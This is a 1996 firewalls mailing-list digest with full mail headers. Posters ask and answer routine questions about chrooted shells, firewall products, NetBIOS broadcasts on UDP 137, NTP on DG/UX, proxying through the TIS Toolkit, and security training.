Tue, 2 Jul 1996 21:10:19 -0700 (PDT) Received: from andrew.cais.com (andrew.cais.com [199.0.216.215]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA20254 for ; Tue, 2 Jul 1996 21:10:12 -0700 (PDT) Received: from pty.com (avatar.pty.com [206.49.54.2]) by andrew.cais.com (8.6.9/8.6.9) with ESMTP id AAA18873 for ; Wed, 3 Jul 1996 00:07:24 -0400 Received: by pty.com (SMI-8.6/SMI-SVR4) Message-Id: <199607021805.XAA08825@pty.com> Subject: Chrooted home directories ? To: firewalls@greatcircle.com Date: Tue, 2 Jul 1996 23:05:46 +0500 (GMT) From: felipe@avatar.pty.com (Ing. Felipe Tribaldos) X-URL: http://www.pty.com/ X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello; Please reply directly by emails, as I'm on the digest list, and don't always get to it on a timely basis. Also, not entirely a Firewall, question however could be used on Bastion Hosts :-), so please forgive the noise. I'm trying to create chrooted home directories to allow restricted shells, and FTP on our system. I created a user with a home dire /export/home/user. Then I copied the /etc /usr/bin /usr/lib from the anon ftp directories. Also copied sh to /export/home/user/bin/sh Then I created a script as follows, and set it as the users shell /etc/chroot /export/home/user usr/bin/sh This runs OK, when I run it from the prompt as root, however when I try to login as the user I get a chroot: not super-user error. I tried setting the login script to owner root, and permission to u+s SUID, but that didn't work either. TIA for any tips. Felipe -- ___________________________________________________________________________ | Ing. Felipe Tribaldos | | Gerente de Operaciones / Operations Manager Tel. +(507)269-3571/223-5111| | CyberMedia Panama Fax. +(507)264-6082 | | Internet Access - Web Publishing Res. +(507)269-7330 | | url: http://www.pty.com/ email: felipe@pty.com | | __________________________________________________________________________| From firewalls-owner Wed Jul 3 01:49:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA01990 for firewalls-outgoing; Wed, 3 Jul 1996 01:31:13 -0700 (PDT) Received: from lapsene.mii.lu.lv (lapsene.mii.lu.lv [159.148.60.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA01972 for ; Wed, 3 Jul 1996 01:31:01 -0700 (PDT) Received: (from uulda@localhost) by lapsene.mii.lu.lv (8.7.5/8.7.1) id LAA04839 for firewalls@greatcircle.com; Wed, 3 Jul 1996 11:28:16 +0300 (EET DST) X-Authentication-Warning: lapsene.mii.lu.lv: uulda set sender to lda!lda.gov.lv!uldis@lda.gov.lv using -f >Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: from lda by lapsene.mii.lu.lv; Wed, 3 Jul 1996 11:28 EET Received: by lda.gov.lv (UUPC/@ v5.00, 25Nov92); Received: by lda.gov.lv (FIDO2UU 1.92d [DOS]); To: firewalls@greatcircle.com From: Uldis Bojars Message-Id: <31DA8200@lda.gov.lv> Subject: OS/2 firewalls? Date: Wed, 3 Jul 1996 10:21:52 +0200 Lines: 17 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi! I am searching for OS/2 firewalls - are there any? It's very hard to find, but I think there are some. Of course I do not want OS/2 because I want to use firewall as a workstation ;-) And - if negative - what are good firewalls for freeBSD? Our company is not so big to buy Sun or HP UNiX computer and use it as a firewall. Uldis ¾ If you learn from mistakes, you will learn a lot today. --- GoldED/386 3.00.Alpha1+ From firewalls-owner Wed Jul 3 03:49:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id DAA08200 for firewalls-outgoing; Wed, 3 Jul 1996 03:36:51 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id DAA08192 for ; Wed, 3 Jul 1996 03:36:42 -0700 (PDT) Received: from user_ins.ins.com ([206.98.131.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id DAA26942; Wed, 3 Jul 1996 03:32:39 -0700 (PDT) Message-Id: <2.2.32.19960703223015.006c87fc@ins.com> X-Sender: martin_d@ins.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 18:30:15 -0400 To: jorge_triana@es.adp.com (Jorge Triana) From: Darwin Martinez Subject: Re: AOL and Compuserve through f/wall Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For AOL, our firewall (FireWall-1) allows service 5190 (tcp) for AOL, and 4144 (tcp) for Compuserve from our internal net to the internet. Our external router (cisco 4500) has some access lists but are not as intensive as the rulebase in our firewall. At 04:02 PM 7/1/96 -0500, you wrote: > > > > Can somebody please tell me how to configure the firewall to get > access to AOL and Compuserve...I have seen some msgs going back and > forth here...but if anybody has specifics, I would appreciate it... > > Let me know what I would have to configure as far as the firewall and > the perimeter router...Thanks.. > > Jorge Triana > jorge_triana@es.adp.com > > > > ------------------------------------------------------------------------ Darwin L. Martinez Email: darwin_martinez@ins.com Network Systems Engineer Site #: 404-843-5954 International Network Services Pager: 800-INS-1-INS Atlanta Office "The God that gave us life gave us liberty at the same time." Thomas Jefferson ------------------------------------------------------------------------ From firewalls-owner Wed Jul 3 04:34:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA10332 for firewalls-outgoing; Wed, 3 Jul 1996 04:24:46 -0700 (PDT) Received: from mail.rc.toronto.on.ca ([207.6.29.231]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA10317 for ; Wed, 3 Jul 1996 04:24:39 -0700 (PDT) Received: from rwcooper.rc.toronto.on.ca ([207.6.29.232]) Received: by rwcooper.rc.toronto.on.ca with Microsoft Mail Message-ID: <01BB68AF.B7985580@rwcooper.rc.toronto.on.ca> From: Russ To: "'Firewalls'" Subject: NEC SocksPlus?? Date: Wed, 3 Jul 1996 07:17:37 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I received the following recently and would appreciate comments from the collective mind... About SOCKS and SocksPlus ------------------------- SOCKS is widely recognized as the de facto standard for Internet proxy firewalls; SocksPlus from NEC is the first commercial implementation of that standard. NEC has been the steward of the publicly available free version of SOCKS since 1993, managing the FTP site where SOCKS source code is available and administering the SOCKS mailing list where users of non-commercial SOCKS trade notes on solving problems concerning SOCKS security, configuration and compatibility. SocksPlus server software is used for all outbound connections in NEC's new turnkey PrivateNet firewall server. SocksPlus contains no original SOCKS source code, but is backward-compatible with the existing installed base of version 4.2 of SOCKS. SocksPlus provides significant improvements over non-commercial SOCKS. The code has been broken into modules and thoroughly tested for added security and easy extensibility. It supports UDP applications and server-to-server encrypted communications, and the configuration files have been completely revised to make them straightforward and intuitive. http://www.privatenet.nec.com Cheers, Russ From firewalls-owner Wed Jul 3 04:49:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA11113 for firewalls-outgoing; Wed, 3 Jul 1996 04:44:06 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA11099 for ; Wed, 3 Jul 1996 04:43:58 -0700 (PDT) Message-Id: <199607031143.EAA11099@miles.greatcircle.com> Received: by cheops.anu.edu.au From: Darren Reed Subject: Re: NEC SocksPlus?? To: Russ.Cooper@RC.Toronto.on.ca (Russ) Date: Wed, 3 Jul 1996 21:41:09 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <01BB68AF.B7985580@rwcooper.rc.toronto.on.ca> from "Russ" at Jul 3, 96 07:17:37 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Russ, sie said: [...] > SocksPlus server software is used for all outbound connections in NEC's new > turnkey PrivateNet firewall server. SocksPlus contains no original SOCKS [...] Can you explain how the term "turnkey" applies to this product ? If I turn the key one way, I get a secure network (where nobody can access the Internet without my saying-so), but if I turn it the other, I get an insecure network (and everyone can use the Internet for anything) ? Thanks, Darren From firewalls-owner Wed Jul 3 05:04:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA10960 for firewalls-outgoing; Wed, 3 Jul 1996 04:39:59 -0700 (PDT) Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.218.93.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA10953 for ; Wed, 3 Jul 1996 04:39:51 -0700 (PDT) Received: (from uucp@localhost) by gate.personal-media.co.jp (8.7.4/3.3W5-gate-mx) id UAA13870 for ; Wed, 3 Jul 1996 20:33:16 +0900 (JST) Received: from sun00(192.9.200.6) by sparc11 via smap (V1.3) Received: from sparc18.sun00net (sparc18 [192.9.200.18]) by sun00.personal-media.co.jp (8.7.5 sendmail.nomx/3.3W5-sun00) with SMTP id UAA26830 for ; Wed, 3 Jul 1996 20:31:25 +0900 (JST) Received: by sparc18.sun00net (4.1/SMI-4.1) Date: Wed, 3 Jul 96 20:31:20 JST From: ishikawa@sparc18.personal-media.co.jp (Chiaki Ishikawa) Message-Id: <9607031131.AA05717@sparc18.sun00net> To: Firewalls@GreatCircle.COM In-Reply-To: <199607030306.UAA15586@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM) Subject: udp 137 broadcast from Win95 PC Reply-To: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 4579 Hello. Recently, I found that a Windows-95 PC located in our DMZ broadcast udp (port=137) packets in DMZ, which subsequently showed up in CISCO router log file. Below is a summary produced from the cisco log for one day. >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times **** culprit win 95 PC **** I looked up UDP 137 in some textbooks on TCP/IP and found no reference to the number 137. Can this safely be ignored? -- Ishikawa, Chiaki ishikawa@personal-media.co.jp (family name, given name) Personal Media Corp. Shinagawa, Tokyo, Japan 142 From firewalls-owner Wed Jul 3 05:34:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA14743 for firewalls-outgoing; Wed, 3 Jul 1996 05:22:40 -0700 (PDT) Received: from www ([206.249.80.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA14725 for ; Wed, 3 Jul 1996 05:22:32 -0700 (PDT) Received: by www (SMI-8.6/SMI-SVR4) Date: Wed, 3 Jul 1996 05:18:20 -0700 (PDT) From: "Michael A. Galati - Information Services" X-Sender: mgalati@www To: firewalls@greatcircle.com Subject: NTP & DG/UX Systems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I realize this may not be the correct mailing list for this type of question, so if someone knows of one please mail back. Thank You in advance.. The question - We have a need to have NTP with authentication running for our DG/UX systems for an application which requires it. The problem, at least with the people we have contacted at DG, is they know of no way to set it up in this mode. I was refered to RFC 1305 which deals with NTP, very interseting reading, which left me very lost. I am not a unix giant by any means, but am willing to learn. I was able to figure out the cisco part without much trouble. That said, Is there anyone who has had success with this ?? Again Thank You.... Mike Galati Information Services William Beaumont Hospital Email - mgalati@beaumont.edu From firewalls-owner Wed Jul 3 05:49:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16161 for firewalls-outgoing; Wed, 3 Jul 1996 05:42:03 -0700 (PDT) Received: from artemis.rus.uni-stuttgart.de (artemis.rus.uni-stuttgart.de [129.69.18.28]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA15981 for ; Wed, 3 Jul 1996 05:38:43 -0700 (PDT) Received: from info2.rus.uni-stuttgart.de (info2.rus.uni-stuttgart.de [129.69.18.15]) by artemis.rus.uni-stuttgart.de with SMTP id OAA24567 Received: by info2.rus.uni-stuttgart.de (AIX 3.2/UCB 5.64/4.03) Message-Id: <9607031234.AA29367@info2.rus.uni-stuttgart.de> Subject: Re: udp 137 broadcast from Win95 PC To: ishikawa@personal-media.co.jp Date: Wed, 3 Jul 1996 14:34:41 +0200 (MST) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9607031131.AA05717@sparc18.sun00net> from "Chiaki Ishikawa" at Jul 3, 96 08:31:20 pm From: Helmut Springer Organization: Stuttgart University, FRG X-Pgp-Fingerprint: AE 42 C3 2C A1 3E 55 6D B3 AC 3C D2 F3 CF FF E7 X-Phone: +49 711 685-2003q X-Fax: +49 711 685-2043 X-Mailer: ELM [version 2.4 PL25 PGP6] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chiaki Ishikawa wrote: > I looked up UDP 137 in some textbooks on TCP/IP and found no reference > to the number 137. > > Can this safely be ignored? netbios-ns 137/tcp # NETBIOS Name Service netbios-ns 137/udp # NETBIOS Name Service regards delta -- helmut 'delta' springer Unix/Net Consulting, InfoSystems, StudBox delta@RUS.Uni-Stuttgart.DE Stuttgart University, FRG http://home.pages.de/~delta/ phone : +49 711 685-2003 If you've got to do it, FAX : +49 711 685-2043 do it with cold blood... From firewalls-owner Wed Jul 3 06:04:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA17167 for firewalls-outgoing; Wed, 3 Jul 1996 05:57:10 -0700 (PDT) Received: from cyber3.servtech.com (cyber3.servtech.com [199.1.22.25]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA17138 for ; Wed, 3 Jul 1996 05:56:50 -0700 (PDT) From: dan@burkegroup.com Received: from burke.burkegroup.com (burke.roc.servtech.com [206.106.148.165]) by cyber3.servtech.com (8.7.5/8.7.5) with SMTP id IAA13103 for ; Wed, 3 Jul 1996 08:54:08 -0400 (EDT) Received: from Connect2 Message Router by burke.burkegroup.com Message-ID: <271DAA3101523000@burke.burkegroup.com> Date: Wed, 3 Jul 96 8:40:06 -0500 Organization: Burke Group To: firewalls@greatcircle.com Subject: Re: NT Backoffice "Catapult" firewall certified? MIME-Version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7BIT X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ron DuFresne said: > > > > I have no problem with firewalls that are so easy to administer,etc, > > BUT, generally, the people who setup these easy-to-use firewalls, > > dont know/think about things like disabling guest account > > (I know, lame example), or setting permissions on shares (or disabling > > all shares, or whatever), etc, and if the firewall software dosnt > > do this for them, then their firewall host can be easilly compromised.... > > > > It takes time and knowledge (well, more like common sense) to make an NT box > > secure(ish). We all know that a large majority of ppl who insist on NT > > because of its ease of use, and requirement for little-to no knowledge > > of system administration and security, dont have the time and knowledge > > to secure their box. [snip] Is there a FAQ or other resources for necessary NT security measures in addition to the firewall? Dan Lenhard From firewalls-owner Wed Jul 3 06:21:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA18222 for firewalls-outgoing; Wed, 3 Jul 1996 06:07:26 -0700 (PDT) Received: from sun.aitc.rest.tasc.com (sun.aitc.rest.tasc.com [147.81.50.129]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA18213 for ; Wed, 3 Jul 1996 06:07:18 -0700 (PDT) Received: from iwdc1.office.rest.tasc.com by sun.aitc.rest.tasc.com (NX5.67e/NX3.0M) Received: from iwdc1.office.rest.tasc.com by iwdc1.office.rest.tasc.com (4.1/SMI-4.1) Message-Id: <9607031305.AA07147@iwdc1.office.rest.tasc.com> X-Mailer: exmh version 1.6.6 3/24/96 To: ishikawa@personal-media.co.jp Cc: Firewalls@greatcircle.com Subject: Re: udp 137 broadcast from Win95 PC In-Reply-To: Your message of "Wed, 03 Jul 1996 20:31:20 +0200." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 03 Jul 1996 09:05:19 -0400 From: Bob Bowes Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chiaki Ishikawa wrote: > PMC e-mail id: 4579 > > Hello. > > Recently, I found that a Windows-95 PC located in our DMZ > broadcast udp (port=137) packets in DMZ, which > subsequently showed up in CISCO router log file. > Below is a summary produced from the cisco log for one day. > [Deleted] Port 137 is used to tunnel MS networking protocols over IP (to support an NT network with IP). I think ports 138 and 139 are also used for NetBUI and something else. These ports should definetly NOT be passed through your router/firewall to the Internet. Bob From firewalls-owner Wed Jul 3 06:30:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16014 for firewalls-outgoing; Wed, 3 Jul 1996 05:39:04 -0700 (PDT) Received: from wintermute.imsi.com (wintermute.imsi.com [206.181.239.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA15986 for ; Wed, 3 Jul 1996 05:38:55 -0700 (PDT) From: robc@webster.imsi.com Received: from relay.imsi.com by wintermute.imsi.com Received: from gt-40 by relay.imsi.com Message-Id: <960703083613.ZM2855@gt-40> Date: Wed, 3 Jul 1996 08:36:02 -0700 In-Reply-To: ishikawa@sparc18.personal-media.co.jp (Chiaki Ishikawa) References: <9607031131.AA05717@sparc18.sun00net> X-Mailer: Z-Mail 4.0.1 (4.0.1 Apr 9 1996) To: ishikawa@personal-media.co.jp, Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk the Microsoft Services uses UDP 137 138 TCP 139 Look in the RFC's on Netbios over TCP/IP for more info robc -- Robert L. Carbone ___ ___....-----'---`-----....___ ========================================= Systems Administrator ___`---..._______...---'___ Email : robc@imsi.com (___) _|_|_|_ (___) Phone : (212)339-2742 \\____.-'_.---._`-.____// ~~~~`.__`---'__.'~~~~ `~~~' Investment Management Services Inc. That Which Does Not kill you Makes you hurt that much longer ! -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQBNAzGA9jYAAAECAOJPmTRxeczPVvJsqV3Jc1hAJsAu19x+nm5yAj9IlBCTBZEE AjAFvi7Q15QnehJaL2p7f40Kj9CkNNTCBgMy31kABRG0E3JvYmM8cm9iY0BpbXNp LmNvbT4= =j6L1 -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Wed Jul 3 06:34:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16312 for firewalls-outgoing; Wed, 3 Jul 1996 05:44:46 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA16299 for ; Wed, 3 Jul 1996 05:44:24 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id OAA08816; Wed, 3 Jul 1996 14:37:21 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from ingpc003.apogee-com.fr by dtcxs001.apogee-com.fr.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31DA69AB.335E@apogee-com.fr> Date: Wed, 03 Jul 1996 14:38:03 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: ishikawa@personal-media.co.jp Cc: Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC References: <9607031131.AA05717@sparc18.sun00net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chiaki Ishikawa wrote: > > PMC e-mail id: 4579 > > Hello. > > Recently, I found that a Windows-95 PC located in our DMZ > broadcast udp (port=137) packets in DMZ, which > subsequently showed up in CISCO router log file. > Below is a summary produced from the cisco log for one day. > > >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times > >UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times > **** culprit win 95 PC **** > > I looked up UDP 137 in some textbooks on TCP/IP and found no reference > to the number 137. > > Can this safely be ignored? > > -- > Ishikawa, Chiaki ishikawa@personal-media.co.jp > (family name, given name) > Personal Media Corp. > Shinagawa, Tokyo, Japan 142The ports # 137 and 138 are used by NetBios on IP. The Broadcasts are used to announce its presence, and learn about possible servers available. (well this is an ugly summary of the whole stuff...) Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Wed Jul 3 06:49:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA21046 for firewalls-outgoing; Wed, 3 Jul 1996 06:39:08 -0700 (PDT) Received: from magneto.acquion.com (magneto.acquion.com [206.154.17.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA21026 for ; Wed, 3 Jul 1996 06:39:00 -0700 (PDT) Received: from wolverine.acquion.com ([206.154.17.12]) Message-Id: <2.2.32.19960703133616.006f0da0@mail.acquion.com> X-Sender: oolid@mail.acquion.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jul 1996 09:36:16 -0400 To: firewalls@greatcircle.com From: oolid@acqic.org (Joseph L. Moll) Subject: Re: udp 137 broadcast from Win95 PC Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:31 PM 7/3/96 JST, you wrote: >>UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=58 3 times >>UDP: src=xxx.yyy.zzz.54(137), dst=xxx.yyy.zzz.255(137), length=76 162 times > **** culprit win 95 PC **** This is how NetBeui works on TCP/IP, usually called NBT or recently CIFS (Common Internet File System, (C) M$). NBT (CIFS) uses UDP ports 137 and 138, and TCP port 139. UDP port 137 is specifically the name services port. UDP(138) is the datagram port; but in my experience it is rarely used and is not required for connectivity. TCP port 139 is the SMB (server message block) port and handles the data transactions. This machine is broadcasting its name for use on that segment. All NBT servers/clients listen on UDP 137 to build their name cache. Your router should not forward these broadcasts, however, you should not allow access to these ports on your DMZ unless you want all the hosts on the InterNET to be able to access your Windows Networking services; especially since Win95 is not exactly secure in the first place. An enterprising person could gain access to your Windows machine via TCP port 139 and possibly UDP port 138 if they are left unsecure. Best Regards, --- Joseph L. (Joe) Moll -- Network and Communications Engineering mailto:oolid@acqic.org http://www.acquion.com ACQUION, Inc. Greenville, SC USA -- Specialists in Electronic Commerce disclaimer: This email is not to be considered official correspondence From firewalls-owner Wed Jul 3 07:04:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA23640 for firewalls-outgoing; Wed, 3 Jul 1996 06:56:48 -0700 (PDT) Received: from mm1 (mm1.sprynet.com [165.121.2.50]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA23629 for ; Wed, 3 Jul 1996 06:56:40 -0700 (PDT) Received: from stoico ([204.146.159.186]) by mm1.sprynet.com with SMTP id <148102-11386>; Wed, 3 Jul 1996 06:50:35 -0700 From: "Mike Stoico" To: "Bob Bowes" Cc: "Firewalls" Subject: Re: udp 137 broadcast from Win95 PC Date: Wed, 3 Jul 1996 09:52:49 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1085 MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-Id: <96Jul3.065035-0700pdt.148102-11386+171@mm1.sprynet.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Bob, > > Port 137 is used to tunnel MS networking protocols over IP (to support an NT > network with IP). I think ports 138 and 139 are also used for NetBUI and > something else. These ports should definetly NOT be passed through your > router/firewall to the Internet. > What are the exposures involved in letting these pass through? -- ========================================================================= Mike Stoico, I/S Security Consultant * Phone: (518)285-2567 MetLife * Fax: (518)285-2542 500 Jordan Rd * E-Mail: mstoico@metlife.com Troy, NY 12180 * URL: www.metlife.com ========================================================================= The opinions expressed here are my own and may not be those of my employer. ========================================================================= ---------- From firewalls-owner Wed Jul 3 07:22:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA24773 for firewalls-outgoing; Wed, 3 Jul 1996 07:03:31 -0700 (PDT) Received: from upsmot01.msn.com (upsmot01.msn.com [204.95.110.78]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA24763 for ; Wed, 3 Jul 1996 07:03:19 -0700 (PDT) Received: from upmajb04.msn.com ([204.95.110.81]) by upsmot01.msn.com (8.6.8.1/Configuration 4) with SMTP id GAA07436; Wed, 3 Jul 1996 06:52:39 -0700 Date: Wed, 3 Jul 96 14:00:25 UT From: "Gary Lynch" Message-Id: To: "CyberEyes" Cc: firewalls@GreatCircle.COM Subject: RE: Training??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You might try MIS Training Institute (508) 879-7999. They specialize in security training. As a second choice, you might want to look at Computer Security Institute (415) 905-2626. Both hold 1/2 day classes around the country. Unfortunately, they're not cheap (usually $850 or so for two day)..... ---------- From: firewalls-owner@GreatCircle.COM on behalf of CyberEyes Sent: Tuesday, July 02, 1996 11:40 AM Cc: firewalls@GreatCircle.COM Subject: Re: Training??? On Tue, 2 Jul 1996, David Tate wrote: > I am looking for IS Security/Firewalling/Network Protection training in MA, > in the month of July. Would anyone be able to recommend such training? If anyone knows of the same kind of things in Quebec/Ontario, I'd appreciate knowing about it... Thanks. Ryan A. Rowe - Montreal, Quebec aka CyberEyes, Rubik'S Cube Tel. -> +1-514-626-0328 | __o o E-Mail -> cyberia@cam.org | _ \<_ <\ WWW -> http://www.cam.org/~cyberia | __/\o_ (_)/(_) /> IRC -> #CAli4NiA, #Triathlon, #Surfing | FTP -> ftp.cam.org /users/cyberia | swim bike run /Seeking Internet-related job./ Read my RESUME on my home page! "I may not know everything, but I'm willing to learn." Will relocate _ANYWHERE_ in North America. "Everyone has their day, mine is July 15th, 1998." From firewalls-owner Wed Jul 3 07:34:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA27530 for firewalls-outgoing; Wed, 3 Jul 1996 07:24:26 -0700 (PDT) Received: from sam.networx.ie (dublin-ts12-236.indigo.ie [194.125.133.236]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA27491 for ; Wed, 3 Jul 1996 07:24:06 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) by sam.networx.ie (8.6.12/8.6.12) with SMTP id PAA10368 for ; Wed, 3 Jul 1996 15:13:24 GMT X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Wed, 3 Jul 1996 15:11:47 BST From: Michael Ryan Reply-To: mike@networx.ie Subject: URL for tcpshow To: Firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As a result of my original posting to this list re tcpshow, I received many requests for the source code. David Wagner has graciously donated some of his disk space to host tcpshow.c. The program is available for download at http://www.cs.berkeley.edu/~daw/mike/tcpshow.c I'll follow up with a man page for the program in a day or so. You'll find the man page in the same directory once I've written it. Thanks to David. Mike --- From firewalls-owner Wed Jul 3 08:04:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA01276 for firewalls-outgoing; Wed, 3 Jul 1996 07:56:44 -0700 (PDT) Received: from keeper.NesbittBurns.ca (keeper.nesbittburns.ca [192.139.71.50]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA01246 for ; Wed, 3 Jul 1996 07:56:33 -0700 (PDT) Received: from NesbittBurns.ca (tds223.nesbittburns.ca) by keeper.NesbittBurns.ca (4.1/SMI-4.1) Received: from xttor1 (xttor1.nesbittburns.ca) by NesbittBurns.ca (5.x/SMI-SVR4) Received: from xttor1 by xttor1 (SMI-8.6/SMI-SVR4) Message-Id: <31DA8975.6AC8@nesbittburns.ca> Date: Wed, 03 Jul 1996 10:53:41 -0400 From: Yasin Shaikh Organization: Nesbitt Burns Inc. X-Mailer: Mozilla 2.0 (X11; U; SunOS 5.5 sun4m) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Integrating Reuters Service thru TIS Toolkit Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to know if some one has written a proxy using the TIS Toolkit to allow Reuters Services for the brokerage industry( not Real Time feed) to proxy thru the firewall (built using TIS Toolkit and Socks). Their tech guy says any generic proxy can be used. What is a generic proxy ? Is it available with TIS Toolkit ? Reuters are only specifying the ports which the proxy will connect to. Any suggestions, advise will be appreciated. Thanks yasin -- Nesbitt Burns Inc. Tel: 416-359-5164 email:yasin@nesbittburns.ca From firewalls-owner Wed Jul 3 08:37:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02819 for firewalls-outgoing; Wed, 3 Jul 1996 08:09:45 -0700 (PDT) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com 